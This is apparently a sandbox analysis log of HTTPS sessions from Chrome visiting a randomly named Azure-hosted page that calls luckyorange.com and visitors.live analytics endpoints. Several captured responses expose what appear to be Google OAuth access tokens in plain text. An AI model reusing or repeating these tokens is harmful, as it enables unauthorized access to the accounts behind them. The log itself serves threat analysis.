                                                        2024-11-28 12:34:59 UTC3778INData Raw: 59 b9 4c 71 14 cf 82 48 8d 76 1c 5d f0 17 17 98 6c 8e b7 ca 2f 86 bb a2 88 84 1a aa 2a 45 e4 b8 a2 0c a5 57 96 20 fb d0 8a 12 94 9e 2b 61 48 38 30 30 1f c5 11 53 31 f6 65 45 13 13 62 72 4e 0e fa 6d 95 14 24 31 b5 1d 57 6f c6 8a ad 58 f7 ca 38 3e 2b 9a a5 0e d4 f2 ae 19 5e b6 0a 06 d8 5a 1d 58 78 e1 8c 8a 9b a8 b8 cd f2 6c 61 5e b9 a2 08 59 e0 14 76 c3 3a bf 74 be 80 8a 09 c2 95 b2 db c5 b3 14 75 15 15 d6 7f 89 c7 7d 2f 78 1c 26 56 ba 58 40 50 a4 d2 65 83 30 80 74 3b 4b 85 ca 61 de 3a 84 2e 42 a4 5d 9e 06 63 a9 44 c1 7b af 42 12 59 69 25 c5 e3 fb 71 a9 6d f8 d1 4a c4 f7 b2 55 97 80 e2 8e d4 37 95 df fe 30 1d ed 7b 9d 9d 7e ec c5 4d ab 6d 35 31 21 67 60 e0 c6 4d af 94 d8 4b 6a 3e f4 13 88 5c 71 a9 a5 24 98 64 15 89 e5 9c 45 03 b4 ec a9 2b b7 6c d5 c5 6c 52
                                                        Data Ascii: YLqHv]l/*EW +aH800S1eEbrNm$1WoX8>+^ZXxla^Yv:tu}/x&VX@Pe0t;Ka:.B]cD{BYi%qmJU70{~Mm51!g`MKj>\q$dE+llR
                                                        2024-11-28 12:34:59 UTC12021INData Raw: 4b 17 4c ae 21 22 05 b4 16 ce dc cc 8d f3 b6 e9 3c 6f 9b f6 79 db c4 f3 c6 f2 a8 ce 60 10 b7 9b 76 91 72 8e f8 4b 39 27 da b1 a4 d0 fb 83 4e c3 2a 17 31 25 43 5e a9 2d 80 e4 f5 a5 57 7c 37 49 07 a3 09 20 57 df 5b f3 82 be 60 64 f7 90 1b e3 6c 0a c8 65 38 88 f3 21 a6 15 01 ae db 63 05 3f c3 21 22 aa 04 c4 96 97 e2 45 1f a4 d4 90 52 89 17 bf 80 74 e9 7b ff 43 a1 37 b2 08 1f 58 ed f3 d1 74 1c 97 98 cd 12 70 ad f0 08 05 06 e3 10 13 bd 46 6e 00 a0 a3 b9 2f 13 ef 2a 96 8c c9 35 91 bc d8 dc 70 89 f6 b7 ba ea 03 d2 ed 0e 33 f0 32 7b ad 1c 9c e6 4a 7d bd e0 c0 d6 8e b7 8b 3f c5 cc d1 52 da 8f 2c f5 02 a0 cb 5a ac 0e 0c ad 26 d9 0c 44 f1 74 61 ed ea 17 7d 62 b9 1d 9f 83 5b 4e c1 73 73 71 a9 29 6c d8 f4 c4 fe 8d 77 ed fe 8d 11 ad 18 00 de 8f 3b c2 59 44 95 05 48 8f
                                                        Data Ascii: KL!"<oy`vrK9'N*1%C^-W|7I W[`dle8!c?!"ERt{C7XtpFn/*5p32{J}?R,Z&Dta}b[Nssq)lw;YDH


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.44981334.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:59 UTC510OUTOPTIONS /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: content-type
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:59 UTC405INHTTP/1.1 204 No Content
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        access-control-allow-methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        vary: Access-Control-Request-Headers
                                                        access-control-allow-headers: content-type
                                                        date: Thu, 28 Nov 2024 12:34:59 GMT
                                                        x-envoy-upstream-service-time: 0
                                                        server: envoy
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.44981135.244.167.1024435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:59 UTC564OUTGET /mqtt HTTP/1.1
                                                        Host: realtime.luckyorange.com
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: XsAUca22kKAxjk88gNVRdw==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        Sec-WebSocket-Protocol: mqttv3.1
                                                        2024-11-28 12:35:00 UTC193INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        date: Thu, 28 Nov 2024 12:35:00 GMT
                                                        server: Cowboy
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.44981234.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:59 UTC510OUTOPTIONS /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: content-type
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:59 UTC405INHTTP/1.1 204 No Content
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        access-control-allow-methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        vary: Access-Control-Request-Headers
                                                        access-control-allow-headers: content-type
                                                        date: Thu, 28 Nov 2024 12:34:59 GMT
                                                        x-envoy-upstream-service-time: 0
                                                        server: envoy
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.44981435.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:59 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: 4iBiNZCn2iQXHKyCfBXezA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:00 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:00 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:00 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.44981634.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:00 UTC599OUTGET /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: application/json
                                                        Content-Type: application/json
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:35:01 UTC365INHTTP/1.1 200 OK
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        content-type: application/json; charset=utf-8
                                                        Content-Length: 1043
                                                        etag: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        date: Thu, 28 Nov 2024 12:35:01 GMT
                                                        x-envoy-upstream-service-time: 0
                                                        server: envoy
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-28 12:35:01 UTC1043INData Raw: 7b 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 3a 22 79 61 32 39 2e 63 2e 63 30 41 53 52 4b 30 47 5a 4d 70 38 57 4c 5f 57 52 75 65 4e 70 5a 6b 43 54 33 4a 66 6e 68 66 71 5f 76 6f 2d 59 64 47 77 36 39 61 6f 30 55 4c 38 39 4a 7a 4b 61 46 59 6b 67 6e 63 65 71 38 56 4d 59 35 63 39 4e 63 56 71 77 4a 79 37 4b 72 6d 74 61 36 6d 5a 30 4e 6e 76 49 43 2d 52 51 5f 4f 45 55 34 71 38 6a 49 41 44 37 44 6c 76 43 52 32 6b 50 52 6f 66 4a 51 6f 36 37 68 4e 46 53 44 4c 39 30 5a 56 79 63 48 72 46 4e 4e 32 73 47 75 55 73 39 30 6c 4a 71 58 47 45 4d 76 59 4d 57 69 6b 4e 45 63 54 49 4a 62 62 6d 4e 48 31 63 64 2d 6a 47 47 66 50 4a 52 6d 4f 32 45 34 56 70 33 62 78 46 79 54 33 57 38 70 56 57 47 6e 72 77 78 53 57 30 57 65 71 7a 57 47 73 74 55 4c 43 2d 33 52 64 4c 42 57 58 39 50 6b 41
                                                        Data Ascii: {"access_token":"ya29.c.c0ASRK0GZMp8WL_WRueNpZkCT3Jfnhfq_vo-YdGw69ao0UL89JzKaFYkgnceq8VMY5c9NcVqwJy7Krmta6mZ0NnvIC-RQ_OEU4q8jIAD7DlvCR2kPRofJQo67hNFSDL90ZVycHrFNN2sGuUs90lJqXGEMvYMWikNEcTIJbbmNH1cd-jGGfPJRmO2E4Vp3bxFyT3W8pVWGnrwxSW0WeqzWGstULC-3RdLBWX9PkA


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.44981734.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:02 UTC651OUTGET /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: application/json
                                                        Content-Type: application/json
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        If-None-Match: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        2024-11-28 12:35:03 UTC325INHTTP/1.1 304 Not Modified
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        etag: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        date: Thu, 28 Nov 2024 12:35:03 GMT
                                                        x-envoy-upstream-service-time: 0
                                                        server: envoy
                                                        Content-Length: 0
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.44981934.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:02 UTC362OUTGET /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:35:03 UTC365INHTTP/1.1 200 OK
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        content-type: application/json; charset=utf-8
                                                        Content-Length: 1043
                                                        etag: W/"413-wEen2qDwxX9FaG3v37d7TaXDwUk"
                                                        date: Thu, 28 Nov 2024 12:35:03 GMT
                                                        x-envoy-upstream-service-time: 1
                                                        server: envoy
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-28 12:35:03 UTC1025INData Raw: 7b 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 3a 22 79 61 32 39 2e 63 2e 63 30 41 53 52 4b 30 47 59 5f 43 35 41 6e 39 44 35 53 71 35 66 79 6e 4c 56 79 4d 78 57 64 7a 6c 6a 47 66 42 49 51 55 33 67 44 4d 35 5a 70 56 63 30 71 36 38 4f 48 78 69 72 35 31 41 44 4f 7a 54 64 5f 46 35 46 48 65 2d 76 4a 4c 56 66 32 58 47 51 36 6f 31 54 39 71 65 56 4d 66 62 74 74 54 61 35 4b 76 43 6f 4d 59 34 42 36 78 49 48 79 37 78 31 42 70 66 65 64 68 4b 43 73 5f 78 48 62 53 37 4f 32 31 47 74 6e 45 39 65 62 5f 2d 32 32 62 76 38 6d 7a 48 65 43 37 50 62 6a 45 6a 47 56 38 66 57 52 4a 71 54 48 46 34 70 6e 46 76 67 33 52 68 61 4d 35 55 4f 38 4f 48 71 6e 73 56 44 6a 62 69 4a 73 6d 77 77 41 62 4a 53 73 62 52 6c 6d 43 48 46 76 41 4c 4f 36 32 52 42 70 72 6f 76 6a 74 56 53 61 6b 5a 69 47 61
                                                        Data Ascii: {"access_token":"ya29.c.c0ASRK0GY_C5An9D5Sq5fynLVyMxWdzljGfBIQU3gDM5ZpVc0q68OHxir51ADOzTd_F5FHe-vJLVf2XGQ6o1T9qeVMfbttTa5KvCoMY4B6xIHy7x1BpfedhKCs_xHbS7O21GtnE9eb_-22bv8mzHeC7PbjEjGV8fWRJqTHF4pnFvg3RhaM5UO8OHqnsVDjbiJsmwwAbJSsbRlmCHFvALO62RBprovjtVSakZiGa
                                                        2024-11-28 12:35:03 UTC18INData Raw: 73 35 62 35 70 6e 69 36 4f 6d 68 6d 77 6e 42 36 22 7d
                                                        Data Ascii: s5b5pni6OmhmwnB6"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.44982134.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:04 UTC651OUTGET /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: application/json
                                                        Content-Type: application/json
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        If-None-Match: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        2024-11-28 12:35:04 UTC325INHTTP/1.1 304 Not Modified
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        etag: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        date: Thu, 28 Nov 2024 12:35:04 GMT
                                                        x-envoy-upstream-service-time: 1
                                                        server: envoy
                                                        Content-Length: 0
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.44982334.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:04 UTC414OUTGET /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        If-None-Match: W/"413-wEen2qDwxX9FaG3v37d7TaXDwUk"
                                                        2024-11-28 12:35:05 UTC366INHTTP/1.1 200 OK
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        content-type: application/json; charset=utf-8
                                                        Content-Length: 1043
                                                        etag: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        date: Thu, 28 Nov 2024 12:35:05 GMT
                                                        x-envoy-upstream-service-time: 53
                                                        server: envoy
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-28 12:35:05 UTC1043INData Raw: 7b 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 3a 22 79 61 32 39 2e 63 2e 63 30 41 53 52 4b 30 47 5a 4d 70 38 57 4c 5f 57 52 75 65 4e 70 5a 6b 43 54 33 4a 66 6e 68 66 71 5f 76 6f 2d 59 64 47 77 36 39 61 6f 30 55 4c 38 39 4a 7a 4b 61 46 59 6b 67 6e 63 65 71 38 56 4d 59 35 63 39 4e 63 56 71 77 4a 79 37 4b 72 6d 74 61 36 6d 5a 30 4e 6e 76 49 43 2d 52 51 5f 4f 45 55 34 71 38 6a 49 41 44 37 44 6c 76 43 52 32 6b 50 52 6f 66 4a 51 6f 36 37 68 4e 46 53 44 4c 39 30 5a 56 79 63 48 72 46 4e 4e 32 73 47 75 55 73 39 30 6c 4a 71 58 47 45 4d 76 59 4d 57 69 6b 4e 45 63 54 49 4a 62 62 6d 4e 48 31 63 64 2d 6a 47 47 66 50 4a 52 6d 4f 32 45 34 56 70 33 62 78 46 79 54 33 57 38 70 56 57 47 6e 72 77 78 53 57 30 57 65 71 7a 57 47 73 74 55 4c 43 2d 33 52 64 4c 42 57 58 39 50 6b 41
                                                        Data Ascii: {"access_token":"ya29.c.c0ASRK0GZMp8WL_WRueNpZkCT3Jfnhfq_vo-YdGw69ao0UL89JzKaFYkgnceq8VMY5c9NcVqwJy7Krmta6mZ0NnvIC-RQ_OEU4q8jIAD7DlvCR2kPRofJQo67hNFSDL90ZVycHrFNN2sGuUs90lJqXGEMvYMWikNEcTIJbbmNH1cd-jGGfPJRmO2E4Vp3bxFyT3W8pVWGnrwxSW0WeqzWGstULC-3RdLBWX9PkA


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.44982634.107.203.2344435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:06 UTC414OUTGET /public-auth HTTP/1.1
                                                        Host: api-preview.luckyorange.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        If-None-Match: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        2024-11-28 12:35:07 UTC325INHTTP/1.1 304 Not Modified
                                                        x-powered-by: Express
                                                        access-control-allow-origin: *
                                                        etag: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
                                                        date: Thu, 28 Nov 2024 12:35:06 GMT
                                                        x-envoy-upstream-service-time: 1
                                                        server: envoy
                                                        Content-Length: 0
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.44983435.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:14 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: hdq/VhhAJjga6bjkBN8FrA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:15 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:15 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:15 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.44983635.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:18 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: rfn1xd3EcB3ERDQXqgiB/Q==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:18 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:18 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:18 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.44983935.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:20 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: L43HKMTcbwZEG1kofVSghA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:21 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:21 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:21 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.44984220.12.23.50443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:25 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZhsWdDdL2+UeRUR&MD=BZCYPKHf HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                        Host: slscr.update.microsoft.com
                                                        2024-11-28 12:35:26 UTC560INHTTP/1.1 200 OK
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/octet-stream
                                                        Expires: -1
                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                        MS-CorrelationId: f70209de-aee4-47c9-b3da-f337b0ec0947
                                                        MS-RequestId: 2a23c186-4273-40eb-9315-c4e1e9d1e9cf
                                                        MS-CV: tCQf6gAsX0GR/7IG.0
                                                        X-Microsoft-SLSClientCache: 1440
                                                        Content-Disposition: attachment; filename=environment.cab
                                                        X-Content-Type-Options: nosniff
                                                        Date: Thu, 28 Nov 2024 12:35:25 GMT
                                                        Connection: close
                                                        Content-Length: 30005
